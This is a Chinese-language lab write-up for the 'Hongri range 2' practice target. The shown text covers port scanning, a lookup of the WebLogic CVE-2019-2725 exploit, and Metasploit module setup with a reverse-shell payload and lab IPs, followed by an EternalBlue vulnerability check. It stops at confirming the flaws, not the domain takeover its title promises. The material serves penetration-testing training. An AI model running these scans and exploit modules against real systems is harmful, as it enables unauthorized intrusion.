红日靶场二：WebLogic CVE-2019-2725 到域控沦陷全流程

靶场信息相关注意事项二、信息搜集1、TCP 端口扫描 指纹识别 操作系统识别工具rustscan nmapnmap带上-Pn参数表示不进行主机发现这是为了避免主机发现失败导致的指纹探测失败。因为nmap的默认扫描逻辑是这样的主机存活探测ICMP ping / TCP ping ↓ 没有响应 ↓ 认为主机已下线 → 直接跳过不扫端口问题在于很多主机尤其是 Windows、有防火墙的服务器会屏蔽 ICMP但端口服务完全正常运行。Nmap 误判主机离线导致你什么都扫不到。命令sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n输出由于输出很长只是截取了关键的部分PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Microsoft IIS httpd 7.5 135/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 63 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 3389/tcp open ms-wbt-server? syn-ack ttl 63 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled) 49152/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49176/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49194/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 60966/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V7.98%E4%D3/31%OT80%CT%CU%PVY%GN%TM69CB43AF%Px86_64-pc-linux-gnu) SEQ(SP106%GCD1%ISR109%TII%TS7) SEQ(SP109%GCD1%ISR108%TII%TS7) OPS(O1M551NW8ST11%O2M551NW8ST11%O3M551NW8NNT11%O4M551NW8ST11%O5M551NW8ST11%O6M551ST11) WIN(W12000%W22000%W32000%W42000%W52000%W62000) ECN(RY%DFY%TG40%W2000%OM551NW8NNS%CCN%Q) T1(RY%DFY%TG40%SO%AS%FAS%RD0%Q) T2(RN) T3(RN) T4(RN) U1(RN) IE(RN) Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026) TCP Sequence Prediction: Difficulty265 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)2、UDP 扫描关键端口 指纹识别补一轮 UDP 扫描以免漏掉关键信息工具Nmap命令sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80输出Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 0800 Nmap scan report for 192.168.111.80 Host is up. PORT STATE SERVICE VERSION 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp 162/udp open|filtered snmptrap 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 514/udp open|filtered syslog 520/udp open|filtered route 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 49152/udp open|filtered unknown Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds3、优先级列表目标大概率是一台 Windows Server 2008 R2架构几乎可以确认是 x64端口聚焦PORT STATE SERVICE REASON VERSION 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)T3 协议是 WebLogic 的远程对象协议默认开放且历史上反复出现反序列化漏洞。PORT STATE SERVICE REASON VERSION 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-dsMS17-010 (EternalBlue) 这个漏洞在 2008 R2 上默认存在直到打补丁为止。三、漏洞查找与验证1、CVE-2019-2725根据指纹信息查找相关的漏洞值得注意的是关键词限制并不是却多越好有些时候放宽点关键词能看到更丰富的信息。查看 CVE 编号zyfkali:~$ searchsploit -x 46780 | head -10 Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution URL: https://www.exploit-db.com/exploits/46780 Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py Codes: CVE-2019-2725 Verified: False File Type: Python script, ASCII text executable, with very long lines (6251) #!/usr/bin/python # Exploit Title: Oracle Weblogic Exploit CVE-2019-2725是 CVE-2019-2725打开 MSF通过search命令找对应的模块msfconsolemsf search CVE-2019-2725 Matching Modules # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService 1 \_ target: Unix . . . . 2 \_ target: Windows . . . . 3 \_ target: Solaris . . . . Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice After interacting with a module you can manually set a TARGET with set TARGET Solaris使用模块并验证msf use 0 [*] Using configured payload cmd/unix/reverse_bash msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) info Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice Platform: Unix, Windows, Solaris Arch: cmd, x64, x86 Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2019-04-23 Provided by: Andres Rodriguez - 2Secure (acamro) acamrogmail.com Module side effects: ioc-in-logs Module stability: crash-safe Module reliability: repeatable-session Available targets: Id Name -- ---- 0 Unix 1 Windows 2 Solaris Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4 RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 7001 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService VHOST no HTTP server virtual host Payload information: Description: An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. References: https://nvd.nist.gov/vuln/detail/CVE-2019-2725 http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999 https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://twitter.com/F5Labs/status/1120822404568244224 View the full module info with the info -d command. msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) set target Windows target Windows msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) set LHOST 192.168.111.44 LHOST 192.168.111.44 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) set RHOST 192.168.111.80 RHOST 192.168.111.80 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) check [] 192.168.111.80:7001 - The target is vulnerable.存在漏洞2、永恒之蓝用 Nmap 的 NSE 脚本验证是否存在漏洞┌──(zyf㉿kali)-[~/hongr2] └─$ sudo nmap --scriptsmb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 0800 Nmap scan report for 192.168.111.80 Host is up (0.068s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds漏洞存在。